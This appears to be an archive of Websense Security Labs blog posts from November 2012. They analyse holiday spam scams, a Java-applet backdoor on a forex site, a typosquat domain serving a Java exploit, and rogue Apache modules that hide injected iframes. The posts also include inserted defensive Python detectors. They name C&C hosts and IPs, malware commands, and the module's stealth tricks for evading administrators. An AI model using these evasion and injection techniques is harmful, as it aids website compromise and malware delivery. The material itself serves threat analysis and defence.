
November 2012 Posts

Personalized Letters From "Scamta" Claus
Posted: 30 Nov 2012 05:21 PM


With Christmas fast approaching, the Websense® ThreatSeeker® Network, replete with festive sleigh bells and twinkling lights, has detected a marked increase in spam emails seeking to exploit fans of the big man himself: Santa Claus. While Santa, along with his ever-loyal team of elves, his reindeer, and, of course, Mrs. Claus, are no doubt working their way through the mountain of letters and wish lists from the world’s good little boys and girls, some bad little boys and girls are looking to capitalize on his backlog of correspondence. They claim to offer alternative services to ensure that your "little ones" receive personalized responses from Santa.

As is often the case in today’s unsolicited email world, the links within these emails don’t take you to a reputable and Santa-approved communication facilitator. Rather than being prompted for personal details about your little ones (which in itself poses an interesting discussion of Internet safety and the sharing of personal details with random websites) you’ll probably find that you’re either a winner, or a potential winner, of some new fruit-branded hardware. All you have to do is complete a survey or an affiliate offer.

These methods were discussed in our Black Friday / Cyber Monday Survival Guide, and merely serve to line the scammer's pockets with affiliate referral cash. They also let the scammer harvest your personal data for further use. While our customers are protected from this and other threats by Websense ACE (Advanced Classification Engine), it would be wise to share details of this campaign with friends and family members who might be more likely to be taken with the idea, especially when Rudolph's "winning prize" carrot is dangled.

 

Messages of this nature that we are currently detecting and blocking appear to be somewhat consistent. Their techniques include:

  • Hiding blocks of text or keywords in the HTML source in an attempt to appear legitimate to automated processes. In this example, the font color is set to white (#ffffff) to make the text invisible to the person reading the email:

    In this case, the text is taken from the Wikipedia article on Larry Hagman.
  • Some of the messages we’ve seen recently deliver the main message as an image loaded from a website. This serves two purposes: first, it makes it difficult for automated processes to read the message; second, the image request confirms that your email address is active, potentially leading to more spam:

    These men can’t both be Santa Claus!
  • Enticing subject lines to catch your attention and elicit a response:
    • Personal Letter From Santa For Your Child
    • (A) Letter From Santa For Your Child
    • Santa Claus Letters
    • A personal letter from Santa for your little ones
    • Custom Santa Letters 
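The first two tricks listed above (white-on-white text and an image-only body) can be checked for mechanically. The scanner below is an added example, not Websense code; its thresholds, flag names and sample messages are assumptions, and the colour list assumes a white page background.

```python
"""Heuristic checks for the two evasion tricks described above: keyword blocks
hidden with a white font colour, and a message delivered as a remotely loaded
image. Added example, not Websense code; thresholds and sample messages are
constructed."""
import re
from html.parser import HTMLParser

# Colours treated as invisible on a white background (assumption: white page).
HIDDEN_COLOURS = {"#ffffff", "#fff", "white"}
COLOUR_IN_STYLE = re.compile(r"color\s*:\s*([#\w]+)", re.IGNORECASE)
# Void elements never get a closing tag, so they must not be pushed on the stack.
VOID_TAGS = {"img", "br", "hr", "meta", "link", "input"}


class SpamHeuristics(HTMLParser):
    """Collects visible text, text hidden by colour, and remote image sources."""

    def __init__(self):
        super().__init__()
        self.visible_text = []
        self.hidden_text = []
        self.remote_images = []
        self._hidden_stack = []  # one bool per open element: does it hide its text?

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        colour = a.get("color")
        if not colour and a.get("style"):
            m = COLOUR_IN_STYLE.search(a["style"])
            colour = m.group(1) if m else None
        if tag == "img":
            src = (a.get("src") or "").strip().lower()
            if src.startswith(("http://", "https://")):
                self.remote_images.append(src)
        if tag not in VOID_TAGS:
            self._hidden_stack.append(bool(colour) and colour.lower() in HIDDEN_COLOURS)

    def handle_endtag(self, tag):
        if tag not in VOID_TAGS and self._hidden_stack:
            self._hidden_stack.pop()

    def handle_data(self, data):
        text = " ".join(data.split())  # collapse whitespace
        if not text:
            return
        # Text is hidden if any enclosing element sets an invisible colour.
        (self.hidden_text if any(self._hidden_stack) else self.visible_text).append(text)


def scan_email(html, min_hidden_chars=40, max_visible_for_image=40):
    """Return counts plus the list of flags raised for one HTML message body."""
    p = SpamHeuristics()
    p.feed(html)
    p.close()
    visible = " ".join(p.visible_text)
    hidden = " ".join(p.hidden_text)
    flags = []
    if len(hidden) >= min_hidden_chars:
        flags.append("hidden-text")
    if p.remote_images and len(visible) < max_visible_for_image:
        flags.append("remote-image-body")
    return {
        "visible_chars": len(visible),
        "hidden_chars": len(hidden),
        "remote_images": p.remote_images,
        "flags": flags,
    }


# Constructed samples in the style of the messages described above.
SPAM_HIDDEN_TEXT = """<html><body>
<p>Personal Letter From Santa For Your Child! <a href="http://example.invalid/go">Click Here</a></p>
<font color="#ffffff">Filler paragraph lifted from an encyclopedia article so that the
message looks like ordinary prose to a filter, while a reader sees only white space.</font>
</body></html>"""

SPAM_IMAGE_BODY = """<html><body>
<img src="http://example.invalid/img/letter.jpg" width="600" height="400">
<br><a href="http://example.invalid/go">Click Here</a>
</body></html>"""

LEGITIMATE = """<html><body><p>Hi, your order has shipped. Track it from your account page.</p>
<img src="cid:logo@example.invalid"></body></html>"""

if __name__ == "__main__":
    for name, body in [("hidden", SPAM_HIDDEN_TEXT), ("image", SPAM_IMAGE_BODY), ("legit", LEGITIMATE)]:
        print(name, scan_email(body)["flags"])
```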

Clicking the "Click Here" links within many of these messages directs you to an official-looking web-browser opinion survey, tailored to the browser from which you are viewing the page:



Simple browser detection and IP geolocation techniques are used to appear convincing


Unfortunately, other than the opinion survey, the only personalized items you’re likely to receive from this point on are more spam, scams or empty offers. No amount of form-filling, survey submissions, or offer completions is likely to result in the desired letter from Santa Claus. Therefore, if you are looking to assist Santa with his letter-sending duties, please stick to reputable organizations. Many charities, for example, provide this service legitimately, and your money is much better off in their pocket than in a scammer's!

Jason Hill

Forex Website Targeted: Did Cybercrooks Find the Weakest Link in Online Money Management Services?
Posted: 28 Nov 2012 02:29 AM

The Websense® ThreatSeeker® Network has detected that a FOREX trading website was injected with a malicious Java applet, which could install malware on the systems of the site's users. FOREX is the foreign exchange market where international currencies are traded, and nowadays it's used by millions of people around the world.

The targeted website is a popular FOREX website called "Trading Forex," located at hxxp://tradingforex.com. One question raised by such a compromise is whether some cybercriminals are shifting their focus from the mainstream online money management systems of banks and stock exchanges to "easier wins": online systems and services that are likely to be less mature from a security perspective. Another interesting fact is that the backdoor dropped at Trading Forex is written in Visual Basic .NET and requires Microsoft's .NET Framework to be installed and operational on the victim's computer.

Websense customers are protected from these and other threats by Websense ACE (Advanced Classification Engine).

At Websense Security Labs™ we are used to seeing this kind of injection, based on malicious Java applets trying to exploit Java vulnerabilities, and we have blogged about them several times. In this case, however, investigating the malicious JAR file brought up some interesting details. The malicious code has been injected at the bottom of the page, as shown here:

At the time of writing, the website hxxp://libertyresarve.info seems to be active; however, in recent days we have seen that it was sometimes turned off, although it was still possible to retrieve the content through the Google cache. We can also be sure that it has been used for typosquatting against the real Libertyreserve (the virtual currency organization) website, as shown below:

The message in red that appears on that web page is a clear attempt to convince users to load the malicious Java applet. Below is the real content of Libertyreserve.com:

At first glance, the JAR file seems to be written not to exploit Java vulnerabilities, but simply to load a binary file hosted at "hxxp://www.libertyresarve.info":

Basically, the Java code is just another Java loader that requires user interaction to load the binary file "123.exe". One interesting point in the screenshot above is that the MANIFEST-INF shows the Java applet has been signed with a certificate. Evaluating the certificate's validity with the "jarsigner" tool (included in the Java SDK) shows that the certificate expired on 5 October 2011, while the applet was signed on 7 July 2011:

Because the certificate has expired, the details of the usual Java warning message reveal why this JAR file is considered suspicious:

Clicking the details offered by the Java plugin alert reveals, as shown, the issues with this untrusted Java applet. This warning mitigates the attack's chance of success, but it is also true that the kind of users this website attracts may be inclined to accept the malicious JAR anyway, out of a potentially false sense of security and trust. The associated binary file also offers an interesting viewpoint. Detection of this file still seems low, as reported here:

https://www.virustotal.com/file/66fdad1bc63eca7d8124d16c83322a6ca3b45546a70ddb0a9e122be6e9aaebfb/analysis/1353429475/

However, we tried submitting the executable file "123.exe" to Websense ThreatScope™, with the following result:

The full analysis, reported here, shows that the C&C contacted by the malware is "hxxp://firestormm6t.no-ip.info", which seems to be associated with the IP address 46.166.129.110:

The file "123.exe" seems to be a ".NET" file, probably written using C#. From deep analysis of the network traffic, it is possible to retrieve the packets exchanged between an infected system and the C2 (reported above). It is easy to see that, at least for the network activity detected, all the information is encoded using plain BASE64. For example, the following screenshot shows the first request from the infected system to the C&C:

The screenshot above shows the exchange of data between the infected system (in blue) and the C&C (in red). Decoding one of the BASE64 strings reveals that all the BASE64 strings above are the strings shown in the windows open on the desktop of the infected system. For example:

Once decoded, it becomes:

That is the caption of the Wireshark window we used to capture the traffic. We also detected other functions, such as screenshots of the desktop taken by the malware. Below, it is possible to recognize the JPEG marker ("JFIF") and the keyword "CAP", which is without doubt short for "CAPTURE":
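A decoder for an exchange of this shape, added here as an example rather than Websense code: each line is decoded as plain BASE64 and then labelled as a window caption or as a "CAP"-prefixed JFIF screenshot. The "direction<TAB>base64" line format, the constructed sample lines and the fake JPEG header are assumptions; the malware's real framing is not shown in the post.

```python
"""Decoder for the kind of exchange captured above, in which every payload
between the infected host and the C&C is plain BASE64. Added example, not
Websense code. The "direction<TAB>base64" line format and the sample lines
are constructed; the real malware's framing is not shown in the post."""
import base64
import binascii

JPEG_SOI = b"\xff\xd8"   # JPEG start-of-image marker
JFIF_TAG = b"JFIF"       # APP0 identifier visible in the captured screenshots
CAPTURE_PREFIX = b"CAP"  # keyword the post reads as short for "CAPTURE"


def decode_payload(b64):
    """Strictly decode one BASE64 string; None if it is not valid BASE64."""
    try:
        return base64.b64decode(b64, validate=True)
    except (binascii.Error, ValueError):
        return None


def classify(raw):
    """Label decoded bytes as a screenshot, a window caption, or unknown binary."""
    if raw.startswith(CAPTURE_PREFIX) and JFIF_TAG in raw[:32]:
        body = raw[len(CAPTURE_PREFIX):]
        return {"kind": "screenshot", "jpeg": body.startswith(JPEG_SOI), "size": len(body)}
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return {"kind": "unknown", "size": len(raw)}
    if text and text.isprintable():
        return {"kind": "caption", "text": text}
    return {"kind": "unknown", "size": len(raw)}


def parse_capture(lines):
    """Turn captured lines into a list of decoded events, one per line."""
    events = []
    for n, line in enumerate(lines, 1):
        direction, _, b64 = line.partition("\t")
        raw = decode_payload(b64.strip())
        if raw is None:
            events.append({"line": n, "direction": direction, "kind": "not-base64"})
            continue
        event = classify(raw)
        event.update(line=n, direction=direction)
        events.append(event)
    return events


# Constructed sample: a minimal JFIF header padded to look like a tiny JPEG.
FAKE_JPEG = (b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
             + b"\x00" * 40 + b"\xff\xd9")
# Constructed capture lines: two window captions, one screenshot, one junk line.
SAMPLE_LINES = [
    "bot>c2\t" + base64.b64encode(b"Capturing from Local Area Connection - Wireshark").decode(),
    "bot>c2\t" + base64.b64encode(b"Untitled - Notepad").decode(),
    "bot>c2\t" + base64.b64encode(CAPTURE_PREFIX + FAKE_JPEG).decode(),
    "bot>c2\tthis is not base64!!",
]

if __name__ == "__main__":
    for ev in parse_capture(SAMPLE_LINES):
        print(ev)
```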


The binary file, as mentioned above, seems to be written for the .NET Framework in Visual Basic .NET. By opening it in the .NET disassembler "ILSpy" (an open source .NET disassembler powerful and robust enough to recover not only the .NET opcodes but also the high-level language behind .NET applications), we were able to identify the main functions and the list of commands used to exchange information and data between the C&C and the affected systems. For example, the function "Init" is the first function called, to collect basic information about the system on which the executable file is run:

The characters "l" and "v" are the init commands sent by the malware on first execution, as seen in the captured network traffic. Other commands can also be identified, such as the Service Pack check (command "SP"):

Or, for example, the function that detects the keys pressed by the user after Enter is pressed (command "[ENTER]"):

There are also other features, such as detection of the CPU architecture (32 or 64 bit), functions to locate files by date, and more. At first glance this malware seems very well written, and it uses an interesting obfuscation mechanism to retrieve and store the data it requires.

Gianluca Giuliani

Black Friday/Cyber Monday Survival Guide
Posted: 23 Nov 2012 09:00 AM


Many of our colleagues, customers and readers will by now have enjoyed their fill of turkey and pumpkin pie for Thanksgiving and are preparing for a second day of festivities with the arrival of Black Friday. For North American retailers and consumers, this traditionally marks the start of the holiday shopping season, and although for many it is not observed as a national holiday, more and more retailers across the globe are launching Black Friday promotions in order to entice consumers and increase sales. Additionally, given that Black Friday is typically a physical 'bricks-and-mortar' retail affair, online retailers seek to continue the shopping frenzy with additional offers, promotions and sales on Cyber Monday, a marketing term coined in 2005 by Shop.org.


Of course, retailers and consumers are not alone in their preparations for the shopping period and here at Websense® Security Labs™, the Websense ThreatSeeker® Network continues to detect and protect customers from numerous malicious campaigns that look to exploit bargain hunters and shoppers throughout this period.

 

Malicious campaigns detected and blocked thus far predominantly play upon Black Friday themes to spam-promote scam websites offering loans, fake degrees and the like. We also see scams that entice victims to complete surveys in order to harvest personal information.

In addition to wearing appropriate clothing and footwear as well as remembering to drink sufficient amounts of water, Security Labs presents our Black Friday/Cyber Monday Survival Guide:

#1 "If it looks too good to be true..."
Large retailers may offer knock-down prices and fantastic first-come-first-served deals; however, think twice before clicking on that email link or completing that purchase on that 'new' website you've just found.


Fake websites are created by scammers to entice buyers using terminology such as 'wholesale prices' or 'liquidated stock'. Combine this with a Black Friday or Cyber Monday deal and you could be convinced that you've just secured the latest gadget at a fraction of the retail price. In reality, you're handing over your payment details to a scammer who will at best only charge you for the fictitious goods.

Apple products for less than half the retail price... Really?

 

These scams are unfortunately not limited to dedicated scam websites; individual fictitious products also infiltrate well-known online retailers and auction sites. Successfully purchasing bargains through third-party sellers via a retailer's 'marketplace' or an online auction is common practice; however, apply rule #1 and consider rule #2.

Remember: "If it looks too good to be true... it probably is."


#2 "It takes many good deeds to build a good reputation..."
Many interactions in our everyday lives rely on reputation and our online interactions should be no different. Just because an email claims to be from a particular retailer or organization it doesn't mean that it is. Many online retailers have spent a great deal of time and effort building their reputation and are unlikely to dilute their brand by sending emails from free webmail accounts or creating websites on obscure URLs.

If you have suspicions regarding an email or link, don't follow it. Go directly to the organization's website before logging in or making a purchase, and don't be afraid to contact an organization to verify the validity of something you've received.

Suspicious URLs can also be checked using our ACEInsight Site Analysis tool, a free service powered by the Websense TRITON™ architecture that will perform a real-time security and content classification check.

 

If you're submitting any personal information online, note that many retailers use additional security features such as HTTPS and Extended Validation (EV) certificates; these are evident from a padlock icon and the organization's name appearing in green in the address bar. They indicate that additional verification steps have been taken and confirm the authenticity of the website you're visiting. If you're making an online purchase or submitting personal or financial information, these measures also help to secure your data in transit and protect it from prying eyes (man-in-the-middle attacks).


Reputation confirmed by an Extended Validation Certificate



If you're considering a purchase from a marketplace seller or online auction remember to review ratings or feedback and confirm that they are reputable. Additionally, avoid using payment methods outside of the marketplace or auction site as these are common scam traits - not only are you likely to fall outside of any payment protection schemes, many scammers will encourage you to use money transfer methods that are difficult to track and recover.

Remember: "It takes many good deeds to build a good reputation, and only one bad one to lose it." - Benjamin Franklin


#3 "Loose lips..."
It's possible that not even your closest friend knows your date of birth (for those of us above a certain age), your mother's maiden name or indeed the name of your first goldfish let alone your PIN, card verification code and credit-card number! Given this, think carefully before surrendering this information and be suspicious of any email, website or social network post that requests personal and/or financial information... you may find that your details are being used to fund someone else's shopping-spree!

 

Phishing campaigns, as shown in our recent Insights Blog, are most popular on Mondays and Fridays, which just so happens to tie in with this weekend's busy shopping period. Financial organizations and retailers are highly unlikely to ask you to 'Verify your account' or 'Unlock your account' and then have you submit all of your personal details again. If in doubt, visit the organization's website directly or contact them via alternate means to confirm their request.

If you're submitting any personal information online, confirm the reputation (rule #2) of the organization. Will they be protecting your data and using it for its intended purpose? Or is this a ruse to gather personal information for further spam/scam campaigns or even identity theft?

Remember: "Loose lips sink ships!"


#4 "There's no such thing as a free lunch..."

As is often the case when invited to lunch with family members, we may pay a small price for lunch by fixing that printer problem or removing malware from the abused family PC... a small price compared to the time and effort required to put the meal in front of you. In the case of scammers, the free lunch, or more to the point the 'free gift card' or 'free hugely popular consumer electronic device', is offered in return for simply filling in an online survey or completing a qualifying purchase in order to secure that vastly more expensive item.

Commonly these scams utilize emails and social network posts claiming to be from popular brands, informing you that 'You have received a gift card from us' or announcing a 'Giveaway'. The links, of course, if not leading you to malicious websites that could potentially compromise your machine, lead you through a series of sites to harvest your personal information and/or entice you into purchasing memberships, ebooks and other items, all in order to secure that great freebie. Once harvested, your data at best could be passed to marketing organizations to further target you, or at worst be used for identity fraud.

Free iPad?

 

Free giftcard?

 

Ask yourself the question, would the brand really give away high-value gift-cards and goods in return for a completed survey? Whilst prize draws and money-off coupons are common rewards, consider our other survival guide tips before answering the question.

Remember: "There's no such thing as a free lunch... somebody has to pay"


#5 "Attachment is the great fabricator of illusions..."

Here in Security Labs, we've seen, blogged about, and protected customers from countless malicious email campaigns which misuse popular brand identities to entice trusting consumers to open malicious attachments which then lead to the compromise of their machines. Whilst no specific examples of Black Friday / Cyber Monday malicious emails are being detected at the time of writing, this attack vector could easily be exploited to take advantage of those of us waiting for an all-important email laden with shopping bargains.

 

However enticing, interesting or compelling an email attachment looks - don't open it unless you are sure of its source.

Attached order confirmations or coupons may appear to be legitimate, particularly when you're placing a number of orders online. Confirm that these are related to transactions that you've made and consider the behavior. Is it normal for this particular retailer to send you the order confirmation as an attachment rather than within the actual email?

Remember: "Attachment is the great fabricator of illusions; reality can be attained only by someone who is detached." - Simone Weil

 

#6: "The hair is real..."

Those of you camping outside stores awaiting the bargain stampede are sure to be using mobile devices to stay up-to-date with the latest offers and news... but how do you keep on top of numerous retailers and offers? A quick search on any mobile application store or marketplace is sure to reveal any one of a number of apps that will take care of this task for you, aggregating numerous news feeds, offers and store deals into one handy app. The question is, can you trust it? As seen with the launch of many high-profile mobile games and applications, attackers exploit mobile users by publishing fake applications which may give you a little more than you've bargained for... perhaps premium-rate SMS, or just harvesting personal data from your smartphone.

Before installing any application, be sure to check the permissions it's requesting. Does a simple offer app really need the ability to modify or delete items on your smartphone's storage card? How about it integrating with your phone book? If in doubt, don't install it. And, of course, check the reviews to confirm that the app's reputation is trustworthy.

Remember: "The hair is real; it's the head that's fake." - Steve Allen

 

#7: "I alone cannot change the world..."

In the sense of community and coming together, please do leave a comment and share anything suspicious you encounter this weekend. Whilst we've prepared this survival guide, albeit in a light-hearted fashion, for Black Friday and Cyber Monday, these threats and our guidelines are relevant throughout the year. Enjoy your shopping and stay safe. And by all means drop us a line if you find any real 'highly desirable consumer electronic gadgets' at knock-down prices!

Remember: "I alone cannot change the world, but I can cast a stone across the waters to create many ripples." - Mother Teresa

 

The Strange Case of the inte1sat Domain Name
Posted: 20 Nov 2012 01:33 AM

Thanks to the Websense® ThreatSeeker® Network, Websense Security Labs™ recently detected an unusual domain name that we have analyzed. The domain name, "inte1sat", substitutes the number "1" for the lower case letter "l", an example of "leet" substitution that surfaced in the 1980s and is still used today. (Leet is a method of constructing words by substituting numbers for letters.)

 


The first step in our investigation was to look into the content of the URL: hxxp://www.inte1sat.com:

As so often happens, the content revealed what appeared to be another Java exploit attempt. We decided to set aside content analysis for the moment and investigate instead the domain name spelled in its normal alpha-English form: "Intelsat.com". Googling Intelsat.com we learned that it is a company involved in satellite technologies and satellite-enabled services (including IP trunking, telecommunications, and more).

Although it was tempting to conclude that "inte1sat.com" is just a "typo squatting domain", we proceeded to Google "www.inte1sat.com" with the following interesting result:

At first glance, as shown above, it appears that the domain is specified in documents stored on the USA Federal Communications Commission (FCC) website. The FCC mandate states: "The Federal Communications Commission regulates interstate and international communications by radio, television, wire, satellite and cable in all 50 states, the District of Columbia and U.S. territories."

At this point we looked at the publicly accessible PDF files that came up in the Google search. When we looked for instances of "inte1sat.com" in the files, we didn't find any. The only explanation we could think of, which is highly speculative, is that the character "l" might be misidentified by the OCR algorithm of the Google PDF caching mechanism when the PDF files are scanned or faxed, as shown below:

Although we couldn't yet connect any dots, the collection of weird indications kept us going. We decided to return to the content of the original domain.

The content clearly shows that it is using Metasploit to retrieve a JAR file exploiting the well-known CVE-2012-4681, which hijacks the Java Security Manager by generating exceptions. Evidence of this is shown below:

Here is the code used to generate the exceptions:

When the exploit is successfully executed, it loads and runs the EXE binary file "IrFKDDEW.exe" embedded in the JAR file. The MD5 of this file, as reported here, indicates that it leads to a backdoor. We submitted the binary file to Websense ThreatScope™ and it detected malicious threats as reported here. Analyzing just the network traffic generated by the malware, we discovered the following behavior:

Each HTTP request was directed to the following domain:

By retrieving and examining the HTTP statistics from Wireshark, we discovered that the requested URLs are unique, except for one that is called twice. Also, the pattern of requested URLs looks something like the output of a pseudo-random generation algorithm:

The URLs are requested at a regular time interval. The C&C (command and control) server is "net.chiquita-brands.com", hosted at IP address 14.36.201.151. Robtex provides this information about that IP address:

Looking at our ThreatSeeker Network database, we see that this host has been known since July 9, 2012. We also note that it appears to be largely unknown to the greater security community, according to Virustotal.

Next we used Robtex to examine the WHOIS record for chiquita-brands.com:

Using the registration information, we found a paper authored by Command Five that indicates that the contact has been registering domains involved in APT and corporate cyber espionage attacks. The entire document is available here: http://www.commandfive.com/papers/C5_APT_SKHack.pdf

 

We cannot confirm that there is a problem in the Google OCR PDF caching mechanism that results in instances of "inte1sat.com" showing up in search results, particularly those of papers hosted by the FCC. We can conjecture that if there is a flaw, it is being exploited via a typo squatting technique to deliver an exploit.  

 

Continuing our search, we discovered additional strong evidence. Going back to the beginning of the analysis, it turns out that the IP address 174.139.91.163, where "inte1sat.com" is hosted, also hosts many other domains. Four especially attracted our interest. Specifically:

- hxxp://net.peasoul.com has been used in Chinese hacking activities and in targeted attacks, as reported in this Pastebin link: hxxp://pastebin.com/yKSQd5Z5

- hxxp://www.attwirelessnetwork.com is another obvious typo squatting domain for the original hosted at www.wireless.att.com (the AT&T Wireless website)

- hxxp://www.rad-waste.org is a clear typo squatting domain for the original website hxxp://www.radwaste.org, a website for radioactive waste management professionals
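A normalizer for the domain-name tricks seen in this post (the leet "1" for "l" of inte1sat discussed at the start, the hyphen insertion of rad-waste and the brand prefix of attwirelessnetwork listed above), written as an added example rather than Websense tooling; it also generalizes to the single-letter misspelling of libertyresarve from the Trading Forex post. The brand watch list is constructed from the domains named in the posts, and registrable_label() assumes a one-part public suffix.

```python
"""Typosquat normalizer for the substitution tricks discussed in this post:
leet digits (inte1sat), hyphen insertion (rad-waste), a brand used as a prefix
(attwirelessnetwork), plus one-character misspellings (libertyresarve).
Added example, not Websense code; the brand list and leet table are assumed."""

# Digits commonly substituted for look-alike letters (assumed leet table).
LEET_MAP = str.maketrans({"1": "l", "0": "o", "3": "e", "4": "a", "5": "s", "7": "t"})


def registrable_label(domain):
    """'www.inte1sat.com' -> 'inte1sat'. No public-suffix list, so 'x.co.uk' is mishandled."""
    parts = domain.lower().strip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def edit_distance(a, b):
    """Levenshtein distance, used to catch one-character misspellings."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def typosquat_findings(domain, brands):
    """Return (brand, technique) pairs for every protected brand the label imitates."""
    label = registrable_label(domain)
    findings = []
    for brand in brands:
        if label == brand:
            continue  # the genuine domain itself
        if label.translate(LEET_MAP) == brand:
            findings.append((brand, "leet"))
        elif label.replace("-", "") == brand:
            findings.append((brand, "hyphen"))
        elif edit_distance(label, brand) == 1:
            findings.append((brand, "one-edit"))  # noisy for very short brands
        elif label.startswith(brand) or label.endswith(brand):
            findings.append((brand, "brand-affix"))  # also noisy for short brands
    return findings


BRANDS = ["intelsat", "radwaste", "att", "libertyreserve"]  # constructed watch list

if __name__ == "__main__":
    for d in ["www.inte1sat.com", "www.rad-waste.org", "www.attwirelessnetwork.com",
              "www.libertyresarve.info", "www.intelsat.com"]:
        print(d, typosquat_findings(d, BRANDS))
```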

 

Each of the typo squatting hosts is active at this time and contains the following content:

Using Robtex to retrieve the WHOIS information, we discovered that three of the domains are registered to the name "Xiaohua Dai":

 

Registrar for hxxp://rad-waste.org

 

Registrar for hxxp://attwirelessnetwork.com

 

Registrar for hxxp://inte1sat.com

Only one is registered to another name (Jiaxin Technology - Yong Liu): 

 

Registrar for hxxp://peasoul.com

There are also several other domains detected on IP address 174.139.91.163, including ssl.mailyuidyahooapis.com and bloomberg-global.com. These may also be used for typo squatting attacks, but at this time those sites are not active.

Websense customers are protected from these and other threats by Websense ACE (Advanced Classification Engine).

Gianluca Giuliani

Websense 2013 Security Predictions
Posted: 14 Nov 2012 02:17 PM

From mass WordPress compromises to a spear-phishing attack on the White House, there is no doubt cybercriminals gained confidence and momentum in 2012.

 

Websense® Security Labs™ looked at recent security and attack trends to come up with hypotheses of the anticipated evolution of threats in 2013.

 

Forecasting threats is a challenging task, especially when trying to nail down the trends and waves of the quickly shifting threat landscape. But we have a solid track record of seeing into the murky future of the security world. If the end of the Mayan calendar doesn't trigger an apocalypse at the end of this year, here's my take on the trends we expect to see emerge and continue in 2013 (you can access the full report here):


1. More cross-platform threats attacking mobile in 2013


Cross-platform threats have increasingly become the norm in the desktop/laptop realm. This expertise will lend itself to attacking these top three mobile platforms: Android, iOS and Windows 8.  Cybercriminals operate toward similar objectives as legitimate application developers and focus on the most profitable platforms. As development barriers are removed, mobile threats will be able to leverage a huge library of shared code.

To draw a parallel to past cross-platform threats, Blackhole has emerged as the premiere exploit kit in the web world. It packages many different exploits together that can determine the operating system of a visitor and deliver the appropriate malware or lure specific to the device. The likelihood of a packaged, multi-platform exploit kit targeting mobile devices is high, only this may be farther off than 2013.

In the meantime, attackers will continue to increasingly use social engineering lures to capture user credentials on mobile devices, a tactic where platform exploitation is nonessential.

2. Legitimate mobile app stores will host more malware in 2013, but legitimate apps behaving badly may become more of a concern.


The success of the mobile app sales model has encouraged developers to create more mobile apps for the market. As a result, we will see an increased volume of malware hosted in legitimate mobile app stores. In addition, jail-broken devices and non-sanctioned app stores will pose significant risk in the enterprise as more organizations allow BYOD. 

So this isn't just the non-sanctioned and open stores we are talking about. We believe there is an increasing likelihood that the bad guys will get a sophisticated piece of malware hidden in an application that will sneak by even vetted, legitimate app stores.

Another challenge is going to be the targeting of legitimate application developers by hackers to steal the vast amount of user data these applications collect (with a user's tacit, but often uninformed, permission). The bad guys will increasingly look to compromise developers' systems to gain access to any data they find profitable.

3. Governments currently involved in cyber-warfare will likely increase their efforts in 2013.


Government-sponsored attacks will increase. In the wake of several public cyber-warfare events, there are a number of contributing factors that will drive more countries toward these strategies and tactics. A reason for this is that these attacks, when successful, work phenomenally well to achieve the attacker's objectives. We are also likely to see new and smaller government cyber-warfare players.

4. Increased awareness will result in fewer hacktivism incidents.


Increased awareness, and the resulting improvements in defensive measures, will result in fewer successful hacktivism incidents, but the sophistication levels of attacks will increase. This is specifically related to data stealing attacks. That said, distributed denial of service (DDoS) attacks will continue to be a weapon in the average hacktivist's arsenal.

5. Cybercriminals will become more 'virtually aware' and find modern bypass methods to avoid detection.


As networks and security vendors both apply virtual machines for applications, servers and sandboxing, threats are preparing for a customized response. Threats will evolve to more frequently and more readily tell if they are in a sandbox environment so they "play nice" until someone lets them into your network. We've already seen this with Flame, but also in more common web attacks where payloads are delivered upon the first, but not secondary visits to a malicious site.

6. Email attacks will evolve to new levels.


Old school techniques will make a comeback while other email threats will evolve to new levels.  Malicious email attachments will make a comeback as malcode authors create polymorphic threats they know antivirus will be unable to stop. Domain generation algorithms and other emerging techniques will bypass current security, use different evasion tactics and increase the targeting of professionals.

 

7. Attacks will continue to exploit legitimate web platforms.

Having owned WordPress, attackers are moving to conquer Joomla, Drupal and phpWind. Vulnerabilities in WordPress have frequently been exploited in mass compromises. Now, because other content management systems (CMS) and service platforms are growing in use and popularity, the bad guys will routinely test the integrity of these systems. This will become increasingly likely as hackers become more regionally focused: as certain platforms gain users in emerging markets, the bad guys will be drawn to these targets.

The full report also includes in-depth articles on mobile security, email security and Java exploits. You can access the full report at http://www.websense.com/2013predictions.

Chris Astacio

Long Live the Injection, and how it Affects YOU!
Posted: 09 Nov 2012 02:40 AM

Cybercriminals are looking for ways to extend the life cycle of injections in websites. Usually, when an attacker gains control of a site, the life span of the code injected into that site depends on how quickly the website administrator notices malicious content added to their web pages.

One of the tactics cybercriminals now employ to extend the life span of injected code is to install rogue modules onto compromised web servers. These modules hide themselves, and the presence of an injection, from system and website administrators, security researchers and criminal competitors.

Image 1: The red arrow below shows the difference between the life span of typical malicious injected code and code injected by a rogue Apache module:

A lot of blogs, articles, and forum discussions have appeared about so-called "underground" forums selling all sorts of hacking tools for "penetration testing." We are monitoring these forums and would like to share some information about web server rootkits. Recently, we've started seeing more tools on sale, such as web server rootkits for injecting and hiding malicious code in all websites hosted on a web server. In the past, these tools were sold only in closed communities and to a small set of people, but researchers, website administrators, and web server administrators have uncovered these tools and started to mention them in blogs and forums.

We have seen several forum discussions about malicious iframes magically appearing on different websites, with the injected URLs constantly changing. Administrators of affected sites and servers have not been able to identify what the problem is.

Image 2: The following forum discusses how injected iframes are constantly appearing on different sites on a server:

According to underground forums, you can buy the "module Apache/2" for $1,000. Features described by the seller include iframe injection into php/html/js files, serving the injection only to unique IPs, and periodically renewing the URLs, all of which add value when the module is used in conjunction with an exploit kit.

Apart from injecting iframes, such modules have a long life cycle, staying in stealth mode and remaining undetected by administrators. Stealth is achieved by collecting and recording the IPs that admins/roots use to log into the server, going quiet while a user is logged in from one of those IPs, not showing iframes to non-unique (repeat) visitors, and going into quiet mode again when suspicious processes like tcpdump are detected. When the admin/root logs off, the module becomes active again.

The author of the rogue Apache module shows, in the following statistics, how successful this tool has been when used to install rogue AVs with different exploit kits.

Image 3: Stats from exploit kits showing successful exploits with the help of the web server Apache rogue module:

How does Websense protect customers from malicious code injected by rogue modules?

When an end user browses to a website injected with malicious code, we protect them with Websense ACE (Advanced Classification Engine). ACE technologies analyze websites in real time, guarding against malicious iframes that mysteriously appear on websites.

